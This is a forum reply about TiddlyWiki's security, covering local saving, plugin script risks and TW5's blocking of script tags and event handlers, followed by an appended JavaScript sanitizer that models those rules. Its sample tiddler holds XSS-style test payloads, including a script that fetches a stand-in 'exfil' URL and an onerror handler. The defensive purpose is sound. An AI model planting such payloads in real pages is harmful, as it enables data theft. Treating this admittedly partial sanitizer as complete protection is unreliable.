On Monday, May 2, 2016 at 7:55:00 PM UTC-7, Stephen Kimmel wrote:
>
> I work for an engineering company and TiddlyWiki is something I use almost
> constantly. My company, however, would rather that I use another wiki
> program that is part of an integrated package. Without going into too much
> detail, the words that immediately come to mind when describing that
> program are "useless" and "vile." Although they've never prohibited me from
> using TiddlyWiki, they have raised questions that I can't easily answer
> such as "How secure is our corporate data?" and "How do you know it isn't
> transmitting data outside the company?" and finally "How do you know it
> won't damage the data on our network?"
>
For many, many years, I have described TiddlyWiki thus: "USE it like a website, OWN it like a document".

Thus, "How secure is our corporate data?"... is a function of how your company handles internal document files, such as Word, Excel, etc. If you follow the same security protocols for handling TiddlyWiki documents as you do for other types, then there is no difference in security.

Regarding "how do you know it isn't transmitting data outside the company"... When using stand-alone .html files, TiddlyWiki always attempts to save the file *locally*. For TiddlyWiki to save to a remote location, it needs to be either running the NodeJS-based TiddlyWiki, or use a server-side script (e.g., store.php). Both of these methods require explicit installation/configuration to be enabled. Thus, it is unlikely that any data could be transmitted outside the company without you knowing. As long as you have security procedures in place to prevent sending unauthorized files to outside entities, then TiddlyWiki poses no more risk than any other file types in use within your company.

As noted above, TiddlyWiki writes *local files* by default. The only data that could be damaged by TiddlyWiki would be the TiddlyWiki files themselves. Fortunately, because each TiddlyWiki file is stand-alone and self-contained, it's very easy to make backups simply by copying the TiddlyWiki file before beginning an editing session. That way, if something does happen, you can always get back to the most recent previously saved data by restoring the file from the backup copy.

> My first reaction is to discount this as paranoia but I don't know the
> inner workings of TiddlyWiki well enough to know it isn't doing those
> things and I'm not sure anyone but Jeremy (and perhaps Eric) do know. I'm
> more worried about Google making copies of my data than I am Jeremy doing
> it. Still Firefox and most modern browsers have gone out of their way to
> prevent applications like TiddlyWiki from working.
>
> On a separate but related note, one of the math routines developed for
> TiddlyWiki used a separate math package to avoid using the "dangerous"
> javascript eval function. Could some malicious bastard create a plugin
> that could actually damage our computers or our data outside the Wiki?
>

In TiddlyWiki Classic, my TiddlyTools InlineJavascriptPlugin allows arbitrary javascript to be invoked from any tiddler. This *does* present a bit of a security gap, in that someone could send you a tiddler that could *try* to mess with your "data outside the wiki". However, nearly all script exploits rely on functions that modern browsers "prevent from working", so TW Classic is relatively safe.

TW5 is even safer. It does not permit use of javascript embedded in tiddlers (i.e. <script>...</script> blocks are ignored), and even prevents use of inline event handlers (onClick, onChange, onSelect, etc.) in HTML code. To invoke javascript code in TW5, it must be contained in a tiddler with a suitable module type (macro, widget, etc.) which the TW5 core invokes during startup. This ensures that there is a mechanism by which the TW core can control what scripts are invoked. This makes it very unlikely that someone could sneak some malicious code into your TW.

enjoy,
-e
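The reply above describes the TW5 content policy in two rules: `<script>` blocks in tiddler HTML are ignored, and inline event-handler attributes (onClick, onChange, onSelect, ...) are dropped. The following is an added example, not TiddlyWiki's own parser or any code from the thread; it is a small stand-alone model of those two rules that a reviewer could run over a tiddler body to see what the policy would strip and to report what it found. The function name `sanitizeTiddlerHtml`, the regular expressions and the sample tiddler body are all constructed for this example.

```javascript
// Added example (not TiddlyWiki code): a minimal model of the TW5 policy
// described in the thread, namely "<script> blocks are ignored" and
// "inline event handlers are not permitted". It rewrites tag-level HTML
// with a small tokenizer and reports what it removed, so it can double as
// a detection pass over tiddler content before it is rendered.

// <script ...> ... </script>, case-insensitive; an unterminated block is
// dropped through to the end of the input rather than left half-open.
const SCRIPT_RE = /<script\b[^>]*>[\s\S]*?(?:<\/script\s*>|$)/gi;

// A start tag: name, attribute text (quoted values may contain '>'), and an
// optional self-closing slash. Closing tags and comments are left untouched.
const TAG_RE = /<([a-zA-Z][\w:-]*)((?:"[^"]*"|'[^']*'|[^<>"'])*?)(\/?)>/g;

// One attribute: name, optionally "= value" (double-, single- or unquoted).
const ATTR_RE = /([^\s=\/>]+)(?:\s*=\s*("[^"]*"|'[^']*'|[^\s>]+))?/g;

// Any attribute whose name starts with "on" is treated as an event handler.
const EVENT_ATTR = /^on[a-z]+$/i;

function sanitizeTiddlerHtml(html) {
  const report = { removedScripts: 0, removedHandlers: [] };

  // Rule 1: script blocks are ignored (removed entirely, contents included).
  let out = html.replace(SCRIPT_RE, () => {
    report.removedScripts += 1;
    return '';
  });

  // Rule 2: inline event handlers are stripped from every start tag; all
  // other attributes are kept verbatim so harmless markup is unchanged.
  out = out.replace(TAG_RE, (whole, name, attrText, selfClose) => {
    const kept = [];
    for (const m of attrText.matchAll(ATTR_RE)) {
      const [, attrName, value] = m;
      if (EVENT_ATTR.test(attrName)) {
        report.removedHandlers.push(`${name}@${attrName.toLowerCase()}`);
        continue;
      }
      kept.push(value === undefined ? attrName : `${attrName}=${value}`);
    }
    return `<${name}${kept.length ? ' ' + kept.join(' ') : ''}${selfClose}>`;
  });

  return { html: out, ...report };
}

// Constructed sample tiddler body exercising both rules (not real content).
const SAMPLE_TIDDLER = [
  '<div class="note">',
  '  <p onclick="alert(1)" class="x">Quarterly figures</p>',
  '  <script>fetch("https://example.invalid/exfil")</script>',
  "  <img src=\"chart.png\" onerror='steal()'/>",
  '  <p ONCLICK=alert(1)>mixed-case handler</p>',
  '</div>',
].join('\n');

if (typeof require !== 'undefined' && require.main === module) {
  const result = sanitizeTiddlerHtml(SAMPLE_TIDDLER);
  console.log(result.html);
  console.log('scripts removed:', result.removedScripts);
  console.log('handlers removed:', result.removedHandlers.join(', '));
}

module.exports = { sanitizeTiddlerHtml, SAMPLE_TIDDLER };
```

Run it with `node` to see the cleaned markup and the report. The report is the useful part from a defender's point of view: a tiddler arriving from outside that trips either counter is worth a look before it is imported, even though the renderer would have neutralised it. This model covers only the two rules the reply names; a complete HTML sanitizer has to handle more than that (for example `javascript:` URLs in `href` and `src`, and SVG or MathML contexts), so it should not be read as a full description of what TW5's parser does.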

